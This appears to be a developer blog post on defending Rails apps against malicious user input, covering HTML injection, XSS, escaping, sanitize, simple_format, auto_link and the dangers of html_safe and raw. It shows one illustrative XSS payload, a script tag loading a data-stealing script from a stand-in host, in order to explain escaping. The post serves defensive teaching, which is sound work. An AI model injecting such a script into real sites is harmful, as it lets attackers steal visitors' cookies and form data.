Handling Bad User Content

Aug 2020

Rails Helpers that Help

When we build web applications, we’re happy when people use them.

Well, most of the time. The trouble is, some people misuse them. And robots, they always misuse them.

So we have to prepare for people and robots trying to break our nice things.

What could a bad actor do?

When we’re talking about a fairly standard web application, a user is presented with a form to tweet in, post in, comment in, whatever in.

When I type into the tweet form on twitter.com, my browser sends that text to Twitter’s servers, which store it in a database.

Then when you open twitter.com, your browser requests information from Twitter’s database, including my tweet text, to display.

Everything seems okay!

HTML

But what if, instead of typing

Here is something to be outraged about

I type

<h1>Here is something to be outraged about</h1>

If Twitter just displayed what I typed, your browser would interpret it as HTML, and render it as such.

Now attempting to inject an <h1> is only a troll-level attempt at acting poorly. Let’s continue on to a more worthy adversary.

XSS

I could tweet

<script src="https://mysite.com/steal_your_information.js" > </script>

When your browser interprets this as HTML, it will actually load steal_your_information.js from mysite.com.

Now you are pwned.

Your browser is running my JavaScript (XSS stands for Cross-Site Scripting), so I can choose to steal your information (cookies, form contents, etc.), or add things to your DOM and ask you to give me new information.

Escaping

One preventative measure is to just render everything as text. In order to do this, we need to escape characters that look like HTML. So if you tweet

<script src="https://mysite.com/steal_your_information.js" > </script>

Then that’s exactly what your followers will see.

No script is loaded; we just look at the HTML like it’s a painting.

The behind-the-scenes escaped version of that chunk of text looks like:

&lt;script src=&quot;https://mysite.com/steal_your_information.js&quot; &gt; &lt;/script&gt;

Instead of < we see &lt;, which is an HTML character entity. I’ve rambled about HTML entities elsewhere on the blog if you’re curious.

If the characters weren’t escaped, the tweet would render as HTML, and nothing would be visible, because <script> tags are hidden in rendered HTML. But the JS would be running in the background 🙃.
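To see the difference between the two outcomes, here is a minimal sketch in plain Ruby. The helper names (escape_for_html, render_tweet_unsafely, render_tweet_escaped) are made up for this example, and the entity table is an assumption covering the five characters that usually matter; it is not the code Twitter or Rails actually runs.

```ruby
# Hypothetical entity table: the five characters that matter in HTML text
# and attribute values, mapped to their character entities.
HTML_ENTITIES = {
  "&" => "&amp;",
  "<" => "&lt;",
  ">" => "&gt;",
  '"' => "&quot;",
  "'" => "&#39;"
}.freeze

# Replace every special character with its entity in a single pass,
# so an ampersand is never escaped twice.
def escape_for_html(text)
  text.gsub(/[&<>"']/, HTML_ENTITIES)
end

# Unsafe: the tweet is dropped into the page verbatim.
def render_tweet_unsafely(text)
  "<p>#{text}</p>"
end

# Safer: the tweet is escaped first, so the browser shows it as text.
def render_tweet_escaped(text)
  "<p>#{escape_for_html(text)}</p>"
end

tweet = '<script src="https://mysite.com/steal_your_information.js" > </script>'
puts render_tweet_unsafely(tweet) # the browser would load the script
puts render_tweet_escaped(tweet)  # the browser would display the text
```

The first line printed contains a live <script> tag; the second contains only entities, which the browser draws as visible characters.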

Sanitizing

Another option is to clean up the user input before it’s displayed, allowing some HTML, and throwing out bad stuff.

So for example, if I tweet

Here’s a link to <a href="https://mysite.com">my website</a>

We want it to render as a sentence with a clickable link, rather than as the raw HTML text.

How to accomplish this stuff in Rails

Rails has a few built-in helpers that can get us on our way.

1. Do Nothing

Rails automatically escapes HTML in user-generated content when it’s displayed in views!

If we need to be explicit, we can use the html_escape utility method.

It takes a string and escapes its HTML characters.

html_escape("<a>Link here</a>")

=> "&lt;a&gt;Link here&lt;/a&gt;"
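If you want to try the same escaping outside a Rails app, Ruby’s standard library ships ERB::Util.html_escape, which performs the same character replacements. This is a small sketch; the wrapper name escape_with_stdlib is made up for the example.

```ruby
require "erb"

# ERB::Util.html_escape is part of Ruby's standard library.
# The wrapper name is hypothetical and only makes the call easier to reuse.
def escape_with_stdlib(text)
  ERB::Util.html_escape(text)
end

puts escape_with_stdlib("<a>Link here</a>")
# ERB::Util.h is the short alias for the same method.
puts ERB::Util.h(%q(Tom & "Jerry"))
```

Note that quotes and ampersands are escaped too, not just angle brackets.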

2. Sanitize

As we hinted at above, Rails’ sanitize method strips away dangerous HTML, such as <script> and <form> tags and attributes like onclick, and allows safe HTML like <strong>, <a>, <img>, etc.

Let’s say our @post.body is:

Here's a <a href="http://google.com">link</a>.
<script src="bad.js"></script>
<img src="image.jpg" />

When we run sanitize(@post.body) in our view, the page shows the sentence with a working link, followed by the image, and the <script> tag never appears in the DOM.

So the good HTML renders as HTML, and allows us to input links and images.

The bad HTML is completely deleted before it even makes its way to the DOM.

Seems like a nice compromise if we want to allow our users to have some control. The sanitize method allows customization, so we can specify if we want to allow or disallow certain HTML tags.
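To make the allowlist idea concrete, here is a toy sketch in plain Ruby. It is not how Rails does it (Rails’ sanitize is built on a real HTML parser), and the regex approach below is not safe for real user input; for example, it does not check what an href points to. The constants and the toy_sanitize name are made up for illustration.

```ruby
# Toy model of an allowlist. Illustrative only, NOT a safe sanitizer.
ALLOWED_TAGS = %w[a strong em img].freeze
ALLOWED_ATTRIBUTES = %w[href src].freeze

def toy_sanitize(html)
  # Drop <script> elements together with anything between the tags.
  without_scripts = html.gsub(%r{<script\b.*?</script>}mi, "")

  # Visit every remaining tag and decide whether to keep it.
  without_scripts.gsub(%r{<(/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>}) do
    closing, name, rest = $1, $2.downcase, $3
    next "" unless ALLOWED_TAGS.include?(name)   # unknown tag: delete it
    next "</#{name}>" unless closing.empty?      # allowed closing tag

    # Keep only allowlisted, double-quoted attributes (onclick and friends go).
    kept = rest.scan(/([a-zA-Z-]+)="([^"]*)"/).select do |attribute, _value|
      ALLOWED_ATTRIBUTES.include?(attribute.downcase)
    end
    attributes = kept.map { |attribute, value| %( #{attribute.downcase}="#{value}") }.join
    "<#{name}#{attributes}>"
  end
end

post_body = <<~HTML
  Here's a <a href="http://google.com">link</a>.
  <script src="bad.js"></script>
  <img src="image.jpg" />
HTML

puts toy_sanitize(post_body)
```

The link and image survive, the script disappears, and anything not on the list is dropped. In a real app, reach for sanitize itself rather than anything regex-based.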

3. Simple_format

Rails’ simple_format(text) first sanitizes the text, and then converts the newlines in the text input into HTML.

This is most common in the case of a textarea — a user might have newlines between text.

For a single newline, simple_format will add a <br> tag.

For two or more consecutive newlines, it starts a new paragraph: the text on either side is wrapped in its own <p> tags.
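The newline rules can be sketched in a few lines of plain Ruby. This is a simplified stand-in, not Rails’ implementation: the name toy_simple_format is made up, and it escapes all HTML up front (an assumption to keep the sketch safe) where the real helper sanitizes instead.

```ruby
require "erb"

# Simplified stand-in for simple_format's newline handling.
def toy_simple_format(text)
  # Assumption: escape everything first; Rails sanitizes instead.
  escaped = ERB::Util.html_escape(text)

  # Normalize Windows and old Mac line endings, then split into
  # paragraphs wherever there are two or more newlines in a row.
  paragraphs = escaped.gsub(/\r\n?/, "\n").split(/\n{2,}/)

  # Inside a paragraph, each remaining newline becomes a <br /> tag.
  wrapped = paragraphs.map do |paragraph|
    "<p>" + paragraph.gsub("\n", "<br />") + "</p>"
  end
  wrapped.join("\n\n")
end

puts toy_simple_format("Hello\nworld\n\nBye")
```

A textarea value with one line break and one blank line comes out as two paragraphs, the first containing a <br />.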

4. Auto_link

The auto_link helper used to be part of Rails core, but has since been moved to an external gem (rails_autolink).

It hasn’t been updated since 2016, but still seems to work well in 2020.

This is useful when users will enter links, without marking them up with HTML. Let’s say you build a chat application, and a user types:

Hey did you see www.thiswebsite.com

As it stands, that link won’t be clickable when it renders in HTML, because no one told Rails that it’s a link. Having to copy and paste links is not fun in a web app, so auto_link will parse the text, and add <a> tags where necessary.

But before doing that, it will sanitize the text, just as we saw above.

Let’s say @post.body is: Hey did you see www.thiswebsite.com. <script src="bad.js"></script>

auto_link(@post.body)

=> "Hey did you see <a href='http://www.thiswebsite.com'>www.thiswebsite.com</a>."

So, the plain-text URL turned into a link, and the built-in sanitize removed the <script>.

And we can even combine this with simple_format if we’re working with textareas.
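For a feel of what auto-linking involves, here is a toy version in plain Ruby. It is a sketch under loud assumptions: the URL_PATTERN regex and the toy_auto_link name are made up, it escapes HTML rather than sanitizing it (so a <script> tag would be shown as text instead of removed), and it ignores edge cases such as URLs wrapped in quotes.

```ruby
require "erb"

# Hypothetical pattern: a URL starts with http://, https://, or www. and
# must not end in sentence punctuation, so a trailing "." stays outside.
URL_PATTERN = %r{(?:https?://|www\.)[^\s<]*[^\s<.,!?]}

def toy_auto_link(text)
  # Assumption: escape everything first so no user HTML gets through.
  escaped = ERB::Util.html_escape(text)

  escaped.gsub(URL_PATTERN) do |url|
    # Bare www. addresses need a scheme to work as an href.
    href = url.start_with?("www.") ? "http://#{url}" : url
    %(<a href="#{href}">#{url}</a>)
  end
end

puts toy_auto_link("Hey did you see www.thiswebsite.com.")
```

The sentence-ending period is left outside the link, which is the kind of detail that makes a maintained gem preferable to a hand-rolled regex.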

5. HTML_Safe or Raw

As we mentioned above, Rails automatically escapes all text before rendering in views. However, if we’re really careful, and want to override this behavior, we can use html_safe or raw.

html_safe is called on a string — "my string".html_safe

raw takes string parameters — raw("my string")

Both methods render the HTML exactly as it came in from the user. If it isn’t already clear — this is dangerous! So, you should only use this if you have a clear idea of what strings are being used (likely not user input).

The main difference between the two is what happens with nil. Calling html_safe on nil raises a NoMethodError (undefined method 'html_safe' for nil:NilClass), while raw calls to_s on its argument first, so nil simply becomes an empty string. Be careful there!
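The nil behavior is easy to reproduce outside Rails. In this sketch, String#html_safe is a stand-in defined only so the example runs on its own (in Rails it returns a string marked as safe), and raw is written in the same shape as the Rails helper: convert to a string, then mark it safe.

```ruby
# Stand-in so the sketch runs without Rails. In a Rails app this method
# already exists and returns a string marked as safe for rendering.
class String
  def html_safe
    self
  end
end

# Same shape as the Rails helper: to_s first, then html_safe.
def raw(stringish)
  stringish.to_s.html_safe
end

body = nil

# nil.to_s is an empty string, so raw never raises here.
puts raw(body).inspect

begin
  # NilClass has no html_safe method, so this raises.
  body.html_safe
rescue NoMethodError => error
  puts "NoMethodError: #{error.message}"
end
```

If a value might be nil and you still want html_safe, calling to_s on it first gives the same tolerance that raw has.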

Conclusion

This post has concluded.